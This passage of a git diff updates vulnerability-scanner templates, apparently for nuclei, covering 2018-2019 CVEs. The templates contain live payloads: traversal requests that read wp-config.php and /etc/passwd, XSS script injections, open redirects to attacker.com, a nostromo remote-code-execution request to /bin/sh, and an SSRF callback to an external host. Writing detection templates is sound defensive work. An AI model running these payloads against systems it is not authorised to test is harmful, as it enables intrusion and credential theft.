+ - https://www.cvedetails.com/cve/CVE-2018-20985/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-20985
+ cwe-id: CWE-20
+ tags: cve,cve2018,wordpress,lfi,plugin
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
+
+ body: "x_login=../../../wp-config"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "The base configuration for WordPress"
+ - "define( 'DB_NAME',"
+ - "define( 'DB_PASSWORD',"
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/13
diff --git a/poc/cve/cve-2018-2893.yaml b/poc/cve/cve-2018-2893.yaml
index b425128530..e7ba463a2a 100644
--- a/poc/cve/cve-2018-2893.yaml
+++ b/poc/cve/cve-2018-2893.yaml
@@ -10,9 +10,10 @@ info:
- https://www.anquanke.com/post/id/152164
- https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL
- https://nvd.nist.gov/vuln/detail/CVE-2018-2893
+ - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2018-2893
tags: cve,cve2018,weblogic,network,deserialization,rce,oracle
@@ -40,5 +41,4 @@ network:
words:
- "StreamMessageImpl cannot be cast to weblogic"
-
# Enhanced by mp on 2022/04/14
diff --git a/poc/cve/cve-2018-3714.yaml b/poc/cve/cve-2018-3714.yaml
index cfc52cbabe..50093afd70 100644
--- a/poc/cve/cve-2018-3714.yaml
+++ b/poc/cve/cve-2018-3714.yaml
@@ -1,8 +1,18 @@
id: CVE-2018-3714
+
info:
name: node-srv Path Traversal
author: madrobot
- severity: high
+ severity: medium
+ description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path.
+ reference:
+ - https://hackerone.com/reports/309124
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2018-3714
+ cwe-id: CWE-22
+ tags: cve,cve2018,nodejs,lfi
requests:
- method: GET
@@ -15,5 +25,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/poc/cve/cve-2018-6200.yaml b/poc/cve/cve-2018-6200.yaml
index 6f68588c00..87bd8ef42a 100644
--- a/poc/cve/cve-2018-6200.yaml
+++ b/poc/cve/cve-2018-6200.yaml
@@ -1,28 +1,37 @@
id: CVE-2018-6200
info:
- name: vBulletin 3.x.x & 4.2.x - open redirect
- author: 0x_Akoko
+ name: vBulletin 3.x.x & 4.2.x - Open Redirect
+ author: 0x_Akoko,daffainfo
severity: medium
- description: vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter.
+ description: |
+ vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter.
reference:
- https://cxsecurity.com/issue/WLB-2018010251
- https://www.cvedetails.com/cve/CVE-2018-6200
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-6200
cwe-id: CWE-601
+ metadata:
+ verified: true
tags: cve,cve2018,redirect,vbulletin
requests:
- method: GET
path:
- - '{{BaseURL}}//redirector.php?url=https://example.com'
- - '{{BaseURL}}/redirector.php?do=nodelay&url=https://example.com'
+ - '{{BaseURL}}/redirector.php?url=https://attacker.com'
+ - '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com'
+ matchers-condition: and
matchers:
- - type: regex
- part: header
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2018-6389.yaml b/poc/cve/cve-2018-6389.yaml
new file mode 100644
index 0000000000..cb3a8f1486
--- /dev/null
+++ b/poc/cve/cve-2018-6389.yaml
@@ -0,0 +1,16 @@
+id: CVE-2018-6389
+
+info:
+ name: Wordpress Load Script
+ author: nadino
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/load-scripts.php?load="
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(x_powered_by,"Engine")'
+ - 'contains(content_type,"javascript")'
diff --git a/poc/cve/cve-2018-8006.yaml b/poc/cve/cve-2018-8006.yaml
new file mode 100644
index 0000000000..c25171c9c6
--- /dev/null
+++ b/poc/cve/cve-2018-8006.yaml
@@ -0,0 +1,38 @@
+id: CVE-2018-8006
+
+info:
+ name: Apache ActiveMQ XSS
+ author: pdteam
+ severity: medium
+ description: An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter.
+ reference:
+ - http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt
+ - http://www.securityfocus.com/bid/105156
+ - https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E
+ - https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E
+ - https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E
+ - https://lists.apache.org/thread.html/03f91b1fb85686a848cee6b90112cf6059bd1b21b23bacaa11a962e1@%3Cdev.activemq.apache.org%3E
+ - https://lists.apache.org/thread.html/3f1e41bc9153936e065ca3094bd89ff8167ad2d39ac0b410f24382d2@%3Cgitbox.activemq.apache.org%3E
+ - https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E
+ - https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E
+ - https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-8006
+ cwe-id: CWE-79
+ tags: cve,cve2018,apache,activemq,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '">'
+ - type: word
+ words:
+ - "/html"
+ part: header
diff --git a/poc/cve/cve-2018-9161.yaml b/poc/cve/cve-2018-9161.yaml
index 5db121e528..f1f172c1cd 100644
--- a/poc/cve/cve-2018-9161.yaml
+++ b/poc/cve/cve-2018-9161.yaml
@@ -4,16 +4,17 @@ info:
name: PrismaWEB - Credentials Disclosure
author: gy741
severity: critical
- description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
+ description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
- https://nvd.nist.gov/vuln/detail/CVE-2018-9161
- tags: cve,cve2018,prismaweb,exposure
+ - https://www.exploit-db.com/exploits/44276/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2018-9161
cwe-id: CWE-798
+ tags: cve,cve2018,prismaweb,exposure
requests:
- method: GET
@@ -32,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/05/13
diff --git a/poc/cve/cve-2018-9205.yaml b/poc/cve/cve-2018-9205.yaml
index 7b192e26e1..5f152b9806 100644
--- a/poc/cve/cve-2018-9205.yaml
+++ b/poc/cve/cve-2018-9205.yaml
@@ -16,8 +16,6 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-9205
cwe-id: CWE-22
- metadata:
- shodan-query: http.component:"drupal"
tags: cve,cve2018,lfi,drupal
requests:
diff --git a/poc/cve/cve-2019-10092.yaml b/poc/cve/cve-2019-10092.yaml
index db7cdb6215..4c728aca64 100644
--- a/poc/cve/cve-2019-10092.yaml
+++ b/poc/cve/cve-2019-10092.yaml
@@ -2,8 +2,19 @@ id: CVE-2019-10092
info:
name: Apache mod_proxy HTML Injection / Partial XSS
- author: pd-team
+ author: pdteam
severity: medium
+ description: In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.
+ reference:
+ - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ - https://lists.debian.org/debian-lts-announce/2019/09/msg00034.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-10092
+ cwe-id: CWE-79
+ tags: cve,cve2019,apache,htmli,injection
requests:
- method: GET
@@ -12,4 +23,4 @@ requests:
matchers:
- type: word
words:
- - ""
\ No newline at end of file
+ - ""
diff --git a/poc/cve/cve-2019-1010290.yaml b/poc/cve/cve-2019-1010290.yaml
index 9530bd36bb..24fe7c97df 100644
--- a/poc/cve/cve-2019-1010290.yaml
+++ b/poc/cve/cve-2019-1010290.yaml
@@ -1,38 +1,28 @@
id: CVE-2019-1010290
info:
- name: Babel - Open Redirect
+ name: Babel - Open Redirection
author: 0x_Akoko
severity: medium
- description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
- remediation: |
- Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability.
+ description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
reference:
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
+ - https://www.cvedetails.com/cve/CVE-2019-1010290
- http://dev.cmsmadesimple.org/project/files/729
- - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-1010290
cwe-id: CWE-601
- epss-score: 0.00198
- epss-percentile: 0.57529
- cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:*
- metadata:
- max-request: 1
- vendor: cmsmadesimple
- product: bable\
tags: cve,cve2019,redirect,babel
-http:
+requests:
- method: GET
path:
- - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
+ - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a004630440220387878ef6292c32281b69d76d22d1833cfcf37aefd7665461f4fa9aa4a8c908a02201e0cab4e9fe60f0a856a455a87653fa0c22a12e9f93f7a149301a4adce973ff5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/poc/cve/cve-2019-11013.yaml b/poc/cve/cve-2019-11013.yaml
index 680aabcde6..1e4b2284c8 100644
--- a/poc/cve/cve-2019-11013.yaml
+++ b/poc/cve/cve-2019-11013.yaml
@@ -3,9 +3,19 @@ id: CVE-2019-11013
info:
name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
author: 0x_Akoko
- severity: high
- reference: https://www.exploit-db.com/exploits/47301
- tags: cves,lfi,nimble
+ severity: medium
+ description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server.
+ reference:
+ - https://www.exploit-db.com/exploits/47301
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-11013
+ - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/
+ - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2019-11013
+ cwe-id: CWE-22
+ tags: cve,cve2019,lfi,nimble
requests:
- method: GET
diff --git a/poc/cve/cve-2019-12276.yaml b/poc/cve/cve-2019-12276.yaml
index 855a1e73c9..f02854bc6b 100644
--- a/poc/cve/cve-2019-12276.yaml
+++ b/poc/cve/cve-2019-12276.yaml
@@ -8,12 +8,14 @@ info:
reference:
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
- tags: cve,cve2019,lfi
+ - https://grandnode.com
+ - https://github.com/grandnode/grandnode
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2019-12276
cwe-id: CWE-22
+ tags: cve,cve2019,lfi
requests:
- method: GET
diff --git a/poc/cve/cve-2019-12581.yaml b/poc/cve/cve-2019-12581.yaml
new file mode 100644
index 0000000000..327f88b08f
--- /dev/null
+++ b/poc/cve/cve-2019-12581.yaml
@@ -0,0 +1,55 @@
+id: CVE-2019-12581
+
+info:
+ name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
+ author: n-thumann
+ severity: medium
+ description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability.
+ reference:
+ - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
+ - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
+ - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12581
+ - https://www.zyxel.com/us/en/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-12581
+ cwe-id: CWE-79
+ epss-score: 0.00642
+ epss-percentile: 0.7705
+ cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: zyxel
+ product: uag2100_firmware
+ shodan-query: http.title:"ZyWall"
+ tags: cve,cve2019,zyxel,zywall,xss
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/free_time_failed.cgi?err_msg="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Please contact with administrator."
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+# digest: 490a0046304402202bbcd24325d27b4afa9692a47676116c3e746dac9efb6781eca7200bedd46d5c02203e77b6aa27e9da81a381ac8a93047e7dfe379956ebf9a6b0196e58a7150cb1a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2019-12583.yaml b/poc/cve/cve-2019-12583.yaml
index dea4b3429c..3f62ff75c8 100644
--- a/poc/cve/cve-2019-12583.yaml
+++ b/poc/cve/cve-2019-12583.yaml
@@ -5,19 +5,31 @@ info:
author: n-thumann,daffainfo
severity: critical
description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks.
+ impact: |
+ An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges.
+ remediation: |
+ Apply the latest firmware update provided by Zyxel to fix the vulnerability.
reference:
- https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
- https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2019-12583
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/StarCrossPortal/scalpel
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2019-12583
cwe-id: CWE-425
- tags: cve,cve2019,zyxel,zywall
+ epss-score: 0.00481
+ epss-percentile: 0.75389
+ cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: zyxel
+ product: uag2100_firmware
+ tags: cve,cve2019,zyxel,zywall,xss
-
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/free_time.cgi"
@@ -34,5 +46,4 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/06/01
+# digest: 4b0a00483046022100a12874f0ef2733bc8c7f0e764fb0ca6289dcb56f72499b238b27b09caf888bb8022100db48c204ba56cf97ad35c36b148a21decd86e83cd35614cb546190faea932e61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2019-15713.yaml b/poc/cve/cve-2019-15713.yaml
new file mode 100644
index 0000000000..d05e3811c7
--- /dev/null
+++ b/poc/cve/cve-2019-15713.yaml
@@ -0,0 +1,40 @@
+id: CVE-2019-15713
+
+info:
+ name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting
+ author: daffainfo,dhiyaneshDk
+ severity: medium
+ description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.
+ reference:
+ - https://wpscan.com/vulnerability/9267
+ - https://wordpress.org/plugins/my-calendar/#developers
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-15713
+ cwe-id: CWE-79
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/21
diff --git a/poc/cve/cve-2019-16278.yaml b/poc/cve/cve-2019-16278.yaml
index 6c393728a2..290be2f6cd 100644
--- a/poc/cve/cve-2019-16278.yaml
+++ b/poc/cve/cve-2019-16278.yaml
@@ -1,20 +1,27 @@
id: CVE-2019-16278
info:
- author: pikpikcu
name: nostromo 1.9.6 - Remote Code Execution
+ author: pikpikcu
severity: critical
-
- # Source: https://www.exploit-db.com/raw/47837
+ description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.
+ reference:
+ - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
+ - https://www.exploit-db.com/raw/47837
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-16278
+ - http://www.nazgul.ch/dev/nostromo_cl.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2019-16278
+ cwe-id: CWE-22
+ tags: cve,cve2019,rce
requests:
- raw:
- |
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
- Content-Length: 1
- Connection: close
echo
echo
@@ -23,4 +30,6 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
\ No newline at end of file
+ - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/03/29
diff --git a/poc/cve/cve-2019-16313.yaml b/poc/cve/cve-2019-16313.yaml
new file mode 100644
index 0000000000..13f6df33f6
--- /dev/null
+++ b/poc/cve/cve-2019-16313.yaml
@@ -0,0 +1,42 @@
+id: CVE-2019-16313
+
+info:
+ name: ifw8 Router ROM v4.31 Credential Discovery
+ author: pikpikcu
+ severity: high
+ description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
+ reference:
+ - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-16313
+ - http://www.iwantacve.cn/index.php/archives/311/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2019-16313
+ cwe-id: CWE-798
+ tags: cve,cve2019,exposure,router,iot
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/action/usermanager.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - '| \*\*\*\*\*\*<\/td>'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ' | \*\*\*\*\*\*<\/td>'
+
+# Enhanced by mp on 2022/03/30
diff --git a/poc/cve/cve-2019-16931.yaml b/poc/cve/cve-2019-16931.yaml
index 92723cdf96..bb94876d8a 100644
--- a/poc/cve/cve-2019-16931.yaml
+++ b/poc/cve/cve-2019-16931.yaml
@@ -1,26 +1,38 @@
id: CVE-2019-16931
info:
- name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
+ name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
- By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
+ WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
+ remediation: |
+ Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability.
reference:
- https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
- - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
- https://wpvulndb.com/vulnerabilities/9893
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
+ - https://wordpress.org/plugins/visualizer/#developers
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-16931
cwe-id: CWE-79
+ epss-score: 0.00244
+ epss-percentile: 0.63842
+ cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
metadata:
- verified: "true"
- tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth
+ verified: true
+ max-request: 1
+ vendor: themeisle
+ product: visualizer
+ framework: wordpress
+ tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan,themeisle
-requests:
+http:
- raw:
- |
POST /wp-json/visualizer/v1/update-chart HTTP/1.1
@@ -44,3 +56,4 @@ requests:
- type: status
status:
- 200
+# digest: 4a0a00473045022100b78e47211e9117540a361a7bbf61d48981be1df9f46a4082d26c40b81df38d6102200512ae445356bf97e4696e845580d7182fea7be874fd8a8faa74d11473c7cc31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2019-16932.yaml b/poc/cve/cve-2019-16932.yaml
new file mode 100644
index 0000000000..096839afa5
--- /dev/null
+++ b/poc/cve/cve-2019-16932.yaml
@@ -0,0 +1,60 @@
+id: CVE-2019-16932
+
+info:
+ name: Visualizer <3.3.1 - Blind Server-Side Request Forgery
+ author: akincibor
+ severity: critical
+ description: |
+ Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
+ impact: |
+ An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage.
+ remediation: |
+ Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/9892
+ - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-16932
+ - https://wordpress.org/plugins/visualizer/#developers
+ - https://wpvulndb.com/vulnerabilities/9892
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+ cvss-score: 10
+ cve-id: CVE-2019-16932
+ cwe-id: CWE-918
+ epss-score: 0.53434
+ epss-percentile: 0.97316
+ cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 1
+ vendor: themeisle
+ product: visualizer
+ framework: wordpress
+ tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive,themeisle
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-json/visualizer/v1/upload-data"
+
+ body: '{\"url\":\"http://{{interactsh-url}}\"}'
+
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ name: http
+ part: interactsh_protocol
+ words:
+ - http
+
+ - type: word
+ part: header
+ words:
+ - application/json
+
+ - type: status
+ status:
+ - 200
+# digest: 490a0046304402207989475e566a8c429d3ffb543eae9696bd0cd6ec52dd6126a0f10ca0df5380ba0220392172acb649aa5ecd64280b32ddf78e01a34d0a597bf1224d335bb8ecfa5445:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2019-17444.yaml b/poc/cve/cve-2019-17444.yaml
index e02dbd7ffb..d7bb5dd6b7 100644
--- a/poc/cve/cve-2019-17444.yaml
+++ b/poc/cve/cve-2019-17444.yaml
@@ -1,18 +1,18 @@
id: CVE-2019-17444
info:
+ name: Jfrog Artifactory <6.17.0 - Default Admin Password
author: pdteam
- name: Jfrog Artifactory default password
severity: critical
description: |
- Jfrog Artifactory uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0.
+ Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.
reference:
- https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes
- https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory
- https://nvd.nist.gov/vuln/detail/CVE-2019-17444
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2019-17444
cwe-id: CWE-521
tags: cve,cve2019,jfrog,default-login
@@ -30,13 +30,14 @@ requests:
